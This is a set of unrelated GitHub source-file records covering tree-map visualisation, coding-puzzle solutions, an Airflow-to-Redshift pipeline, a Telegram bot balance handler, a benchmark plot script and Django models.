]:\n\n\n\n\n\n# In[18]:\n\n\n#utm15_wgs84 = Proj(init='epsg:32632', proj='utm',zone=10,ellps='WGS84', preserve_units=False)\nutm15_wgs84 = Proj(init='epsg:5243', proj='utm', zone='32N', ellps=\"GRS80\")\ndf[['lon', 'lat']] = df.apply(lambda row:utm15_wgs84(row['RECHTSWERT'], row['HOCHWERT'], inverse=True), axis=1).apply(pd.Series)\n\n\n# In[5]:\n\n\ny_range_min = df['lat'].quantile(0.01)\ny_range_max = df['lat'].quantile(0.99)\nx_range_min = df['lon'].quantile(0.01)\nx_range_max = df['lon'].quantile(0.99)\n\n\n# In[6]:\n\n\ndf.head()\ndf.drop(columns=['Gattung/Art/Deutscher Name'])\ndf['Kronendurchmesser'].unique()\nnp.sort(df['Kronendurchmesser'])\n\n\n# In[8]:\n\n\nbins = [0,2,4,6,10,15,20,30,50]\nlabels = ['mini', 'klein', 'klein_2', 'mittel', 'mittel_2', 'mittel_3', 'groß', 'groß_2']\ndf['diskret_kronendurchmesser'] = pd.cut(df.Kronendurchmesser, bins=bins, labels=labels)\ndf.drop(columns=['Gattung/Art/Deutscher Name'])\n\n\n# In[7]:\n\n\n# Alle Bäume, die nach 2000 gepflanzt wurden\ndf['Pflanzjahr'] = (df['Pflanzjahr'].astype(int))\nnew_df = df[df['Pflanzjahr'] >= 2000].copy()\n\n\n# In[8]:\n\n\nsw = webm(x_range_min, y_range_min)\nne = webm(x_range_max, y_range_max)\nFFM = zip(sw, ne)\n\n\n# In[9]:\n\n\n# Initialize plot for datashader\n\nplot_width = int(2000)\nplot_height = int(2000)\nbackground=\"black\"\nexport = partial(export_image, background = background, export_path=\"export\")\n#cm = partial(colormap_select, reverse=(background!=\"black\"))\ncm = partial(colormap_select, 
reverse=(background!=\"black\"))\n\n\ndisplay(HTML(\"\"))\n\n\n# In[10]:\n\n\ncvs = ds.Canvas(plot_width, plot_height, *FFM)\nagg = cvs.points(df, 'RECHTSWERT', 'HOCHWERT')\n\n\n# In[23]:\n\n\n# Export image on different styles or conditions\nexport(tf.shade(agg, cmap = cm(Greys9,0.2), how='log'), \"Frankfurt_Baumbestand\")\n\n\n# In[22]:\n\n\nfrom colorcet import fire\nexport(tf.shade(agg, cmap = cm(fire,0.4), how='log'), \"Frankfurt_Baumbestand_Fire\")\n\n\n# In[21]:\n\n\nfrom colorcet import glasbey\nexport(tf.shade(agg, cmap = cm(glasbey,0.4), how='eq_hist'), \"Frankfurt_Baumbestand_Glasbey\")\n\n\n# In[15]:\n\n\nfrom colorcet import glasbey\ncvs = ds.Canvas(plot_width, plot_height, *FFM)\nagg = cvs.points(df, 'RECHTSWERT', 'HOCHWERT', ds.count_cat('diskret_kronendurchmesser'))\nexport(tf.shade(agg, cmap = cm(glasbey,0.4)), \"Frankfurt_Baumbestand_Category\")\n\n\n# In[16]:\n\n\nlegend_elements = list()\n\n# Create legend for tree size colors \nlabels = dict(\n zip(\n [\n 'mini', \n 'klein', \n 'klein_2', \n 'mittel', \n 'mittel_2', \n 'mittel_3', \n 'groß', \n 'groß_2'],\n np.arange(8) ) )\n\nfor category, category_code in labels.items(): \n element = Line2D(\n [0],\n [0], \n marker='o',\n color='k',\n label=category,\n markerfacecolor=glasbey[category_code],\n markersize=10)\n \n # append legend entry to list of legend entries\n legend_elements.append(element)\n\n#Create arbitrary plot\nfig, ax = plt.subplots()\nlegend = ax.legend(handles=legend_elements, loc='center')\n\n#Format the legend \nlegend.get_frame().set_linewidth(1)\nlegend.get_frame().set_facecolor('k')\nplt.setp(legend.get_texts(), color='w')\n\n# save SVG of legend to file\nplt.savefig('legend.png')\nplt.close()\n\n\n# In[ ]:\n\n\n\n\n\n# In[17]:\n\n\nfrom colorcet import fire\ny_range_min_new = new_df['lat'].quantile(0.01)\ny_range_max_new = new_df['lat'].quantile(0.99)\nx_range_min_new = new_df['lon'].quantile(0.01)\nx_range_max_new = new_df['lon'].quantile(0.99)\n\nsw_new = webm(x_range_min_new, y_range_min_new)\nne_new = webm(x_range_max_new, y_range_max_new)\nFFM_new = zip(sw_new, ne_new)\n\n\nplot_width = int(2000)\nplot_height = int(2000)\nbackground=\"black\"\nexport = partial(export_image, background = background, export_path=\"export\")\n#cm = partial(colormap_select, reverse=(background!=\"black\"))\ncm = partial(colormap_select, reverse=(background!=\"black\"))\n\n\ndisplay(HTML(\"\"))\n\ncvs = ds.Canvas(plot_width, plot_height, *FFM)\nagg = cvs.points(new_df, 'RECHTSWERT', 'HOCHWERT')\n\nexport(tf.shade(agg, cmap = cm(fire,0.4), how='log'), \"Frankfurt_Baumbestand_nach_2000\")\n\n\n# In[17]:\n\n\nfrom datashader.utils import lnglat_to_meters\ndf.loc[:, 'lon'], df.loc[:, 'lat'] = lnglat_to_meters(df.lon,df.lat)\n\n\n# In[12]:\n\n\nimport holoviews as hv\nfrom holoviews.element.tiles import EsriImagery\nfrom holoviews.operation.datashader import datashade\n#from datashader.utils import lnglat_to_meters\nhv.extension('bokeh')\nfrom colorcet import fire\n\n#df.loc[:, 'lon'], df.loc[:, 'lat'] = lnglat_to_meters(df.lon,df.lat)\nmap_tiles = EsriImagery().opts(alpha=0.5, width=900, height=600, bgcolor='black')\npoints = hv.Points(df, ['lon', 'lat'])\nbaum = datashade(points, x_sampling=1, y_sampling=1, cmap=fire, width=900, height=480)\nbaum_map = map_tiles * baum\n\nbaum_map\n\n\n# In[12]:\n\n\nimport bokeh\nhv.save(baum_map, 'frankfurter_baum.html', backend='bokeh')\n\n\n# In[24]:\n\n\n\n\n\n# In[13]:\n\n\nfrom keplergl import KeplerGl\nimport pandas as pd\nimport geopandas as gpd\n\n\n# In[22]:\n\n\nmap = 
KeplerGl(height=800)\nmap.add_data(data=df, name=\"test\")\n\n\n# mape = KeplerGl(height=500)\n\n# \n\n# In[23]:\n\n\nmap\n\n\n# In[25]:\n\n\nconfig = map.config\n\n\n# In[29]:\n\n\nmap_2 = KeplerGl(height=800, data={\"test\": df})\nmap_2\n\n\n# In[31]:\n\n\nconfig_2 = map_2.config\nconfig_2\n\n\n# In[32]:\n\n\nmap_2.save_to_html(data={\"test\": df}, config=config_2, file_name=\"Kepler_Baumkataster_Height.html\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"smorrow1/baumkataster_viz","sub_path":"Baumkataster_Visualisierung/Viz/Baumanalyse_Frankfurt.py","file_name":"Baumanalyse_Frankfurt.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43188881895","text":"N = int(input())\nvals = []\nnonzero = None\nfor _ in range(N):\n x, y, h = (int(x) for x in input().split())\n vals.append((x,y,h))\n if h > 0:\n nonzero = (x,y,h)\n\nfor cx in range(0,101):\n for cy in range(0,101):\n H = nonzero[2] + abs(nonzero[0]-cx) + abs(nonzero[1]-cy)\n if H <= 0:\n continue\n\n ok = True\n for x, y, h in vals:\n h2 = max(H - abs(x-cx) - abs(y-cy), 0)\n if h2 != h:\n ok = False\n break\n\n if ok:\n print(cx,cy,H)\n exit()\n\n\n","repo_name":"hitochan777/kata","sub_path":"atcoder/mayokon/20221209/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14310696248","text":"groupAnswers = []\ngroupForms = []\n\nwith open('day6input.txt', 'r') as file:\n for item in file.readlines():\n if item == \"\\n\":\n groupAnswers.append([data for data in groupForms])\n groupForms.clear()\n else:\n groupForms.append(item.strip())\n\ndef part1():\n uniqueCountPerGroup = []\n answerCount = set()\n\n for answerList in groupAnswers:\n for listItem in answerList:\n for answer in listItem:\n answerCount.add(answer)\n \n uniqueCountPerGroup.append(len(answerCount))\n answerCount.clear()\n\n print(f\"Part 1. solution {sum(uniqueCountPerGroup)}\")\n \ndef part2():\n allYesPerGroup = []\n answerCount = {}\n\n for answerList in groupAnswers:\n for listItem in answerList:\n for answer in listItem:\n if answer in answerCount:\n answerCount[answer] += 1\n else:\n answerCount[answer] = 1\n \n allYesPerGroup.append(sum([1 for x in answerCount.keys() if answerCount[x] == len(answerList)]))\n answerCount.clear()\n \n \n print(f\"Part 2. 
solution {sum(allYesPerGroup)}\")\n\n\npart1()\npart2()","repo_name":"vhrvoje2/AdventOfCode2020","sub_path":"day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8112078068","text":"import io\r\n\r\nf = io.open(r'quotes_filtering.txt', 'r', encoding=\"utf-8\")\r\n\r\nread_data = f.read()\r\ndata=[]\r\nquotes = []\r\nauthors = []\r\na = ''\r\n\r\nfor i in read_data:\r\n if i != '\\n':\r\n a += i\r\n else:\r\n data.append(a)\r\n a = ''\r\n\r\nf.close()\r\na = 0\r\n\r\nfor i in data:\r\n a += 1\r\n if a % 2:\r\n quotes.append(i)\r\n else:\r\n authors.append(i)\r\n\r\nif __name__ == '__main__':\r\n print(quotes)\r\n print(authors)\r\n","repo_name":"Wind-of-fortune/Telegram_Quotebot","sub_path":"read_parsed_file.py","file_name":"read_parsed_file.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72866779024","text":"def to_7sys(n):\r\n c_n = n\r\n l = 0\r\n while c_n > 0:\r\n l += 1\r\n c_n //= 7\r\n\r\n num = [0]*l\r\n\r\n for i in range(l-1, -1, -1):\r\n num[i] = n%7\r\n n //= 7\r\n\r\n return num\r\n#end def\r\n\r\n\r\ndef ile_niep(num):\r\n ilosc = 0\r\n for i in range(len(num)):\r\n if num[i]%2 == 1:\r\n ilosc += 1\r\n return ilosc\r\n#end def\r\n\r\n\r\ndef zgodne(n1, n2):\r\n num1 = to_7sys(n1)\r\n num2 = to_7sys(n2)\r\n return ile_niep(num1) == ile_niep(num2)\r\n#end def\r\n\r\n\r\ndef matrioszka(tab1, tab2):\r\n n1 = len(tab1)\r\n n2 = len(tab2)\r\n for w2 in range(n2-n1):\r\n for k2 in range(n2-n1):\r\n ilosc = 0\r\n for w1 in range(n1):\r\n for k1 in range(n1):\r\n if zgodne(tab1[w1][k1], tab2[w2+w1][k2+k1]):\r\n ilosc += 1\r\n #end for\r\n #end for\r\n if ilosc >= (n1*n1)/3:\r\n return True\r\n #end for\r\n #end for\r\n return False\r\n#end def\r\n\r\nt1 = [[2 for _ in range(3)] for _ in range(3)]\r\nt2 = [[2 for _ in range(10)] for _ in range(10)]\r\nprint(matrioszka(t1, t2))\r\n","repo_name":"bchwast/AGH-WDI","sub_path":"Kolokwia 19_20/k2_grB_ex1.py","file_name":"k2_grB_ex1.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"32704413296","text":"MATRIX_SIZE = 5\nPLAYER = \"A\"\nTARGET = \"x\"\nEMPTY = \".\"\nMOVE_DIRECTION = {\n \"up\": (-1, 0), \"down\": (+1, 0), \"left\": (0, -1), \"right\": (0, +1)\n}\nTARGET_SHOTS_INDICES = [\n\n]\n\n\ndef build_field(n):\n \"\"\"you will be given an integer N for the size of the field with square shape\"\"\"\n field_matrix = []\n for r in range(n):\n field_matrix.append([x for x in input().split(\" \")])\n return field_matrix\n\n\ndef get_player_position(field):\n player_indices = None\n target_count = 0\n for row_idx in range(len(field)):\n for col_idx in range(len(field[row_idx])):\n if field[row_idx][col_idx] == PLAYER:\n player_indices = (row_idx, col_idx)\n if field[row_idx][col_idx] == TARGET:\n target_count += 1\n\n return player_indices, target_count\n\n\ndef get_to_move_cell(player, direction, steps):\n aim_row_idx, aim_col_idx = MOVE_DIRECTION[direction]\n new_row_idx = player[0] + aim_row_idx * steps\n new_col_idx = player[1] + aim_col_idx * steps\n next_player_indices = (new_row_idx, new_col_idx)\n return next_player_indices\n\n\ndef get_update_move_field(field, next_row_idx, next_col_idx, player_position):\n if is_in_range(field, next_row_idx, next_col_idx) and field[next_row_idx][next_col_idx] == 
EMPTY:\n field[player_position[0]][player_position[1]] = EMPTY\n field[next_row_idx][next_col_idx] = PLAYER\n return field, next_row_idx, next_col_idx\n\n\ndef is_target(field, player_pos, direction):\n dir_row, dir_col = MOVE_DIRECTION[direction]\n aim_row, aim_col = dir_row + player_pos[0], dir_col + player_pos[1]\n\n while True:\n if not is_in_range(field, aim_row, aim_col):\n return False\n if field[aim_row][aim_col] == TARGET:\n target_shot(field, aim_row, aim_col)\n return True\n aim_row, aim_col = aim_row + dir_row, aim_col + dir_col\n\n\ndef target_shot(field, row, col):\n TARGET_SHOTS_INDICES.append([row, col])\n field[row][col] = EMPTY\n\n\ndef is_in_range(field, next_row, next_col):\n return 0 <= next_row < len(field) and 0 <= next_col < len(field)\n\n\ndef are_targets_shot(all_targes, targets_shot):\n return all_targes <= targets_shot\n\n\ndef main(field, lines_count, all_targets=0, targets_shot=0):\n mem_player_pos = []\n for _ in range(lines_count):\n command = input()\n if not mem_player_pos:\n player_position, all_targets = get_player_position(field)\n mem_player_pos.append(player_position)\n else:\n player_position = mem_player_pos[-1]\n\n if command.startswith(\"shoot\"):\n _, direction = command.split(\" \")\n if is_target(field, player_position, direction):\n targets_shot += 1\n\n elif command.startswith(\"move\"):\n _, direction, steps = command.split(\" \")\n steps = int(steps)\n next_row_idx, next_col_idx = get_to_move_cell(player_position, direction, steps)\n if is_in_range(field, next_row_idx, next_col_idx):\n field, row, col = get_update_move_field(field, next_row_idx, next_col_idx, player_position)\n mem_player_pos.append([row, col])\n\n if are_targets_shot(all_targets, targets_shot):\n return all_targets, targets_shot\n\n return all_targets, targets_shot\n\n\ndef print_solution(all_the_targets, all_targets_shot, ALL_TARGET_SHOTS_INDICES):\n if all_targets_shot < all_the_targets:\n print(f\"Training not completed! {all_the_targets - all_targets_shot} targets left.\")\n else:\n print(f\"Training completed! All {all_the_targets} targets hit.\")\n for location in ALL_TARGET_SHOTS_INDICES:\n print(location)\n\n\nstarting_field = build_field(MATRIX_SIZE)\nlines_count = int(input())\nall_targets, targets_shot = main(starting_field, lines_count)\nprint_solution(all_targets, targets_shot, TARGET_SHOTS_INDICES)\n","repo_name":"vvakrilov/python_courses","sub_path":"03. 
Advanced/12.Regular Exam/02.1.py","file_name":"02.1.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5294303213","text":"from datetime import datetime, timedelta\nimport os\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators import PostgresOperator\nfrom airflow.operators.subdag_operator import SubDagOperator\nfrom operators import (StageToRedshiftOperator, LoadFactOperator,\n LoadDimensionOperator, DataQualityOperator)\nfrom helpers import SqlQueries\nfrom sparkify_dimensions_subdag import load_dim_tables_subdag\n\n\ndefault_args = {\n 'owner': 'Saverio Guzzo',\n 'depends_on_past': False,\n 'email_on_failure': False,\n 'retries': 5,\n 'retry_delay': timedelta(minutes=5),\n 'catchup': False\n}\n\nparent_dag = 'Project5_DataPipeline_Airflow'\n\ndag = DAG(parent_dag,\n start_date = datetime.today() - timedelta(days=2),\n default_args=default_args,\n description='Load and transform data in Redshift with Airflow',\n schedule_interval='@hourly',\n max_active_runs = 1\n)\n\nstart_operator = DummyOperator(task_id='Begin_execution', dag=dag)\n\nstage_events_to_redshift = StageToRedshiftOperator(\n task_id='Stage_events',\n dag=dag,\n redshift_conn_id=\"redshift\",\n aws_credentials_id=\"aws_credentials\",\n table=\"staging_events\",\n s3_bucket=\"udacity-dend\",\n s3_key=\"log_data\",\n format_file=\"log_json_path.json\"\n)\n\nstage_songs_to_redshift = StageToRedshiftOperator(\n task_id='Stage_songs',\n dag=dag,\n redshift_conn_id=\"redshift\",\n aws_credentials_id=\"aws_credentials\",\n table=\"staging_songs\",\n s3_bucket=\"udacity-dend\",\n s3_key=\"song_data\",\n)\n\nload_songplays_table = LoadFactOperator(\n task_id='Load_songplays_fact_table',\n dag=dag,\n redshift_conn_id=\"redshift\",\n load_fact_query=SqlQueries().songplay_table_insert\n)\n\n# load_user_dimension_table = LoadDimensionOperator(\n# task_id='Load_user_dim_table',\n# dag=dag,\n# redshift_conn_id=\"redshift\",\n# load_dim_query=SqlQueries().users_table_insert\n# )\n\n# load_song_dimension_table = LoadDimensionOperator(\n# task_id='Load_song_dim_table',\n# dag=dag,\n# redshift_conn_id=\"redshift\",\n# load_dim_query=SqlQueries().songs_table_insert\n# )\n\n# load_artist_dimension_table = LoadDimensionOperator(\n# task_id='Load_artist_dim_table',\n# dag=dag,\n# redshift_conn_id=\"redshift\",\n# load_dim_query=SqlQueries().artists_table_insert\n# )\n\n# load_time_dimension_table = LoadDimensionOperator(\n# task_id='Load_time_dim_table',\n# dag=dag,\n# redshift_conn_id=\"redshift\",\n# load_dim_query=SqlQueries().time_table_insert\n# )\n\nload_dim_table_tasks = SubDagOperator(\n task_id = 'Load_dim_tables_tasks',\n subdag=load_dim_tables_subdag(parent_dag,\n 'Load_dim_tables_tasks',\n default_args),\n default_args=default_args,\n dag=dag\n)\n\nrun_quality_checks = DataQualityOperator(\n task_id='Run_data_quality_checks',\n dag=dag,\n redshift_conn_id=\"redshift\",\n tables = [\"artists\", \"songplays\", \"songs\", \"time\", \"users\"]\n)\n\nend_operator = DummyOperator(task_id='Stop_execution', dag=dag)\n\n\nstart_operator >> [stage_events_to_redshift, stage_songs_to_redshift] >> load_songplays_table\nload_songplays_table >> load_dim_table_tasks >> run_quality_checks\nrun_quality_checks >> 
end_operator","repo_name":"saveriogzz/Udacity_Data_Engineering_Nanodegree","sub_path":"Project5_DataPipelines_Airflow/dags/sparkify_dag.py","file_name":"sparkify_dag.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7535439056","text":"import os\nimport subprocess\nimport io\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom jinja2 import Environment, BaseLoader\n\nbuild_path = os.path.join(\"build-clang-6.0-14\")\n\nbenchmark = os.path.join(build_path, \"test\", \"benchmark_switch\")\n\nout = subprocess.check_output([benchmark, \"--benchmark_format=csv\"])\nstream = io.StringIO(out.decode())\nstream.seek(0)\ndf = pd.read_csv(stream)\n\ndf[\"implementation\"] = df[\"name\"].apply(lambda x: x.split(\"<\")[0])\ndf[\"number\"] = df[\"name\"].apply(lambda x: int(x.split(\"<\")[1].split(\">\")[0]))\n\nplt.style.use(\"ggplot\")\nplt.figure(figsize=(16, 12))\nfor implementation, group in df.groupby(\"implementation\"):\n plt.plot(group[\"number\"], group[\"cpu_time\"], \"o-\", label=implementation)\nplt.legend()\n\ngraph = \"benchmark_switch.png\"\nplt.savefig(os.path.join(\"script\", graph))\n\nintervals = df[df[\"number\"].isin({4, 8, 16, 32, 64, 128})]\ntable = intervals.pivot(index=\"implementation\", columns=\"number\")[\n \"cpu_time\"\n].to_string()\nprint(table)\n\nbenchmark_md = \"\"\"\n# Benchmarks\n\nBenchmarking is done against \"hand-rolled\" switch-case statements. The benchmark problem is inspired by mpark variant's [execute.mpark.cpp](https://github.com/mpark/variant/blob/benchmark/visit.1/execute.mpark.cpp)\n\n![benchmark graph](./{{graph}})\n\n```\n{{table}}\n```\n\"\"\"\n\nrendered = (\n Environment(loader=BaseLoader)\n .from_string(benchmark_md)\n .render(graph=graph, table=table)\n)\n\nwith open(\"script/benchmark.md\", \"w\") as fd:\n print(rendered, file=fd)\n","repo_name":"yuqian90/integral_switch","sub_path":"script/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17314708094","text":"# Given an array of integers, find the first missing positive integer in \n# linear time and constant space. In other words, find the lowest \n# positive integer that does not exist in the array. The array can \n# contain duplicates and negative numbers as well.\n# For example, the input [3, 4, -1, 1] should give 2. 
The input \n# [1, 2, 0] should give 3.\n# You can modify the input array in-place.\n\narr1 = [3, 4, -1, 1]\narr2 = [1, 2, 0]\n\nfrom Quicksort import quicksort\n\nquicksort(arr1, 0, len(arr1) - 1)\nquicksort(arr2, 0, len(arr2) - 1)\n\ninteger1 = 1\nfor i in range(len(arr1)):\n if arr1[i] == integer1:\n integer1 += 1\n if arr1[i] > integer1:\n break\nprint(integer1)\n\ninteger2 = 1\nfor i in range(len(arr2)):\n if arr2[i] == integer2:\n integer2 += 1\n if arr2[i] > integer2:\n break\nprint(integer2)","repo_name":"reemahs0pr0/Daily-Coding-Problem","sub_path":"Problem3 - Array (Missing_Lowest_Positive_Integer).py","file_name":"Problem3 - Array (Missing_Lowest_Positive_Integer).py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29936462395","text":"import asyncio\nimport decouple\n\nfrom aiogram import Dispatcher, types\nfrom keyboards import inline\nfrom database import users, balance, nft, binance_db, stabpool\n\n\nasync def balance_handler(call: types.CallbackQuery):\n language = await users.user_data(call.from_user.id)\n user_balance = await balance.get_balance(call.from_user.id)\n photo = decouple.config(\"BANNER_BALANCE\")\n dao = await nft.nft_id(call.from_user.id)\n binance_balance = await binance_db.get_binance_ac(call.from_user.id)\n stabpool_data = await stabpool.get_stabpool_data(call.from_user.id)\n stabpool_balance = round(stabpool_data[0], 2) if stabpool_data else None\n stabpool_deposit = round(stabpool_data[1], 2) if stabpool_data else None\n stabpool_withdrawal = round(stabpool_data[2], 2) if stabpool_data else None\n text = f\"Ваш индивидуальный номер участника DAO, зафиксированный в смарт-контракте: {dao}\" \\\n f\"\\n\\n💵 Коллективный аккаунт\" \\\n f\"\\nВаш баланс: {round(user_balance[0], 2)} USDT\" \\\n f\"\\nАктивный депозит: {round(user_balance[1], 2)} USDT\"\n try:\n text += f\"\\n\\n💰 Личный аккаунт\" \\\n f\"\\nБаланс Binance API: {round(binance_balance[0], 2)}\" \\\n f\"\\nБаланс J2M: {round(binance_balance[1], 2)}\" \\\n f\"\\nАктивный депозит: {round(binance_balance[2], 2)}\" if binance_balance is not None else \"\"\n except TypeError:\n pass\n text += f'\\n\\nСтабилизационный пул' \\\n f'\\nБаланс: {stabpool_balance} USDT' if stabpool_balance else ''\n text += f'\\nАктивный депозит: {stabpool_deposit} USDT' if stabpool_deposit else ''\n text += f\"\\n\\n👨‍👦‍👦 Партнерские начисления: {round(user_balance[3], 2)} USDT\"\n text += f\"\\n\\nСумма зарезервированная на вывод (коллективный аккаунт): {round(user_balance[2], 2)} \" \\\n f\"USDT\" if int(user_balance[2]) > 0 else \"\"\n text += f\"\\n\\nСумма зарезервированная на вывод (стабилизационный пул): {stabpool_withdrawal} \" \\\n f\"USDT\" if stabpool_withdrawal else \"\"\n text += \"\\n\\nГрафик работы \" \\\n \"торгового бота\"\n if language[4] == \"EN\":\n text = f\"Your individual participant number in the DAO, recorded in the smart contract: {dao}\" \\\n f\"\\n\\n💵 Collective Account\" \\\n f\"\\nYour Balance: {round(user_balance[0], 2)} USDT\" \\\n f\"\\nActive Deposit: {round(user_balance[1], 2)} USDT\"\n try:\n text += f\"\\n\\n💰 Personal Account\" \\\n f\"\\nBinance API Balance: {round(binance_balance[0], 2)}\" \\\n f\"\\nJ2M Balance: {round(binance_balance[1], 2)}\" \\\n f\"\\nActive Deposit: {round(binance_balance[2], 2)}\" if binance_balance is not None else \"\"\n except TypeError:\n pass\n text += f'\\n\\nStabilization Pool' \\\n f'\\nBalance: {stabpool_balance} USDT' if stabpool_balance else ''\n 
text += f'\\nActive Deposit: {stabpool_deposit} USDT' if stabpool_deposit else ''\n text += f\"\\n\\n👨‍👦‍👦 Partner Earnings: {round(user_balance[3], 2)} USDT\"\n text += f\"\\n\\nAmount Reserved for Withdrawal (Collective Account): {round(user_balance[2], 2)} \" \\\n f\"USDT\" if int(user_balance[2]) > 0 else \"\"\n text += f\"\\n\\nAmount Reserved for Withdrawal (Stabilization Pool): {stabpool_withdrawal} \" \\\n f\"USDT\" if stabpool_withdrawal else \"\"\n text += \"\\n\\nTrading Bot Work Schedule\"\n photo = decouple.config(\"BANNER_BALANCE_EN\")\n await call.message.delete()\n try:\n if user_balance[4]:\n text_x = await users.get_text(\"Создание кошелька #1\", language[4])\n text_x2 = await users.get_text(\"Создание кошелька #2\", language[4])\n text_x2 = text_x2.replace(\"{ключ}\", f'{user_balance[3]}')\n message = await call.message.answer(text_x)\n await call.bot.send_chat_action(call.message.chat.id, \"typing\")\n await asyncio.sleep(1)\n await call.bot.delete_message(chat_id=call.message.chat.id,\n message_id=message.message_id)\n await call.message.answer(text_x2)\n await call.bot.send_chat_action(call.message.chat.id, \"upload_photo\")\n await asyncio.sleep(1)\n except IndexError:\n pass\n await call.message.answer_photo(\n photo=photo,\n caption=text,\n reply_markup=inline.balance_history(language[4]))\n\n\nasync def withdrawal_refill_history(call: types.CallbackQuery):\n language = await users.user_data(call.from_user.id)\n await call.message.delete()\n history_type = 'OUT' if call.data == 'withdrawal_history' else 'IN'\n if call.data == 'withdrawal_history':\n history_text = 'вывода'\n if language[4] == \"EN\":\n history_text = 'withdrawal'\n else:\n history_text = 'пополнения'\n if language[4] == 'EN':\n history_text = 'refill'\n all_user_data = await balance.get_balance_history(call.from_user.id, history_type)\n for user_data in all_user_data:\n text = f\"Дата: {user_data[0].strftime('%d.%m.%Y %H:%M:%S')}\\nCумма: {user_data[1]}\" \\\n f\"\\nХэш транзакции: {user_data[2]}\" \\\n f\"\\nТип аккаунта: {user_data[3]}\"\n if language[4] == \"EN\":\n hash_ = user_data[2]\n hash_ = 'Personal Account' if hash_ == 'Личный аккаунт' else hash_\n text = f\"Date: {user_data[0].strftime('%d.%m.%Y %H:%M:%S')}\" \\\n f\"\\nAmount: {user_data[1]}\" \\\n f\"\\nTransaction Hash: {hash_}\" \\\n f\"\\nAccount type: {user_data[3]}\"\n await call.message.answer(text)\n if not all_user_data:\n text = f'У вас нет истории {history_text}!'\n if language[4] == \"EN\":\n text = f'You have no {history_text} history!'\n await call.message.answer(text, reply_markup=inline.back_button(language[4]))\n else:\n text = f'Вывод истории завершён!'\n if language[4] == \"EN\":\n text = f'History output completed!'\n await call.message.answer(f\"{text}\", reply_markup=inline.back_button(language[4]))\n\n\ndef register(dp: Dispatcher):\n dp.register_callback_query_handler(balance_handler, text='balance')\n dp.register_callback_query_handler(withdrawal_refill_history,\n lambda c: c.data in ['withdrawal_history', 'refill_history'])\n","repo_name":"west3n/j2mbot","sub_path":"handlers/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":7308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29057843829","text":"data = input(\"Data: \")\ndata = data.split(\"/\")\nmeses = {\n 1:\"janeiro\",\n 2:\"fevereiro\",\n 3:\"março\",\n 4:\"abril\",\n 5:\"maio\",\n 6:\"junho\",\n 7:\"julho\",\n 8:\"agosto\",\n 9:\"setembro\",\n 10:\"outubro\",\n 
11:\"novembro\",\n 12:\"dezembro\",\n}\n\n# for i in range(len(meses)-1):\n# if data[1] == meses[i]:\n# print(f\"Você nasceu em {data[0]} de {meses[i]} {data[2]}\")","repo_name":"VicRyan007/logica-de-programacao","sub_path":"python/lists/list6.py","file_name":"list6.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23101589282","text":"import string, secrets, sys\nfrom datetime import datetime, timedelta\nfrom math import floor\n\nfrom dateutil.relativedelta import relativedelta\nfrom num2words import num2words\n\nfrom django.core.validators import MinLengthValidator, MaxLengthValidator, RegexValidator, MinValueValidator, \\\n MaxValueValidator, FileExtensionValidator\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.urls import reverse\nfrom django.template.defaultfilters import date as data_ptbr\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.auth.models import AbstractUser\nfrom django_resized import ResizedImageField\nfrom home.funcoes_proprias import valor_format, tratar_imagem, cpf_format, cel_format, cep_format\nfrom ckeditor.fields import RichTextField\nfrom home.funcoes_proprias import modelo_variaveis, modelo_condicoes, tamanho_max_mb\n\napenas_numeros = RegexValidator(regex=r'^[0-9]*$', message='Digite apenas números.')\nestados_civis = (\n (0, 'Solteiro(a)'),\n (1, 'Casado(a)'),\n (2, 'Separado(a)'),\n (3, 'Divorciado(a)'),\n (4, 'Viuvo(a)'))\n\n\ndef user_uuid():\n con_codigo = ''.join(\n secrets.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(10))\n return f'{con_codigo[:10]}'\n\n\ndef parcela_uuid():\n recibo_codigo = ''.join(\n secrets.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in\n range(6))\n return f'{recibo_codigo[:3]}-{recibo_codigo[3:]}'\n\n\n# Gerar o código para o contrato:\ndef gerar_codigo_contrato():\n codigos_existentes = list(Contrato.objects.all().values(\"codigo\").values_list('codigo', flat=True))\n while True:\n con_codigo = ''.join(\n secrets.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(10))\n if con_codigo not in codigos_existentes:\n return f'{con_codigo[:5]}-{con_codigo[5:]}'\n\n\nclass Usuario(AbstractUser):\n RG = models.CharField(max_length=9, null=True, blank=True, help_text='Digite apenas números',\n validators=[MinLengthValidator(7), MaxLengthValidator(9), apenas_numeros])\n CPF = models.CharField(max_length=11, null=True, blank=True, 